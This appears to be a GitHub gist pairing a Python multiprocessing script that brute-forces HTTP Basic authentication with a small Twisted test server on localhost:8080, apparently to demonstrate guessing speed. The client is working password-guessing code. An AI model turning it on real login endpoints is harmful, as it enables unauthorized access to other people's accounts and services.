secret
Last active

Brute force basic http authorization using httplib and multiprocessing

  • Download Gist
http-auth-client.py
Python
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Brute force basic http auth."""
from __future__ import print_function
import sys
import time
 
from base64 import b64encode
from itertools import repeat
from multiprocessing import Pool
from string import digits
from timeit import default_timer as timer
 
try:
from httplib import HTTPConnection
except ImportError:
from http.client import HTTPConnection # py3k
 
try:
from itertools import izip as zip
except ImportError: # py3k
zip = zip
 
 
def gen_passwords(): # ~400K/s
for a in "aA"+digits:
S = "sS$"+digits
for s1 in S:
for s2 in S:
for o in u"oO0$_癙":
yield u"p{a}{s1}{s2}w{o}rd".format(**locals())
 
 
def report_error(*args):
print("error %s" % (args,), file=sys.stderr)
 
conn = None
def check(user, password, nretries=0): # ~1100/s
global conn # use 1 connection per process
if conn is None:
conn = HTTPConnection('localhost', 8080, strict=True)
conn.request('GET', '/', headers={'Authorization': b'Basic ' + b64encode(
(user + ':' + password).encode('utf-8'))}) # see rfc5987
r = conn.getresponse()
r.read() # should read before sending the next request
 
if r.status == 401:
return
elif r.status == 200:
return (user, password)
elif nretries > 0: # retry
time.sleep(5./nretries**2)
return check(user, password, nretries=nretries-1)
else:
report_error((user, password), r.status)
 
 
def mp_check(args):
global conn
try:
return check(*args)
except Exception as e:
report_error(args, e)
import traceback
traceback.print_exc(file=sys.stderr)
 
try: conn.close() # prevent fd leaks
except: pass
conn = None # reset connection
 
 
def main():
user = u"guest"
 
start = timer()
pool = Pool(processes=20)
args = zip(repeat(user), gen_passwords())
for n, found in enumerate(pool.imap_unordered(mp_check, args), 1):
if found:
print("found %s" % (found,))
break
t = timer() - start
print("Processed %d passwords in %.2f seconds (%.0f p/s)" % (n, t, n/t))
 
 
if __name__=="__main__":
main()
http-auth-server.py
Python
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
# -*- coding: utf-8 -*-
"""A password-protected per-user Twisted Web Server (rpy script)
 
see http://jcalderone.livejournal.com/53074.html
 
Install:
 
$ pip install twisted
 
Run:
 
$ twistd -n web --port="interface=localhost:tcp:8080" --resource-script=http-auth-server.py
 
Visit http://localhost:8080/
"""
cache() # rpy magic to use the same CredentialFactory for multiple requests
 
from twisted.cred import checkers, portal as portals
from twisted.web import guard, static, resource as resources
from zope.interface import implements
 
class Resource(resources.Resource):
 
def __init__(self, user):
resources.Resource.__init__(self)
self.user = user
 
def getChild(self, path, request):
return static.Data("user %r path %r" % (self.user, path), "text/plain")
 
class Realm(object):
implements(portals.IRealm)
 
def requestAvatar(self, avatarId, mind, *interfaces):
if resources.IResource in interfaces:
return (resources.IResource, Resource(avatarId), lambda: None)
raise NotImplementedError()
 
checker = checkers.InMemoryUsernamePasswordDatabaseDontUse(guest=b'p4$Sw癙rd',
ascii=b'abc')
portal = portals.Portal(Realm(), [checker])
credFactory = guard.BasicCredentialFactory("Test server")
resource = guard.HTTPAuthSessionWrapper(portal, [credFactory])

Please sign in to comment on this gist.

Something went wrong with that request. Please try again.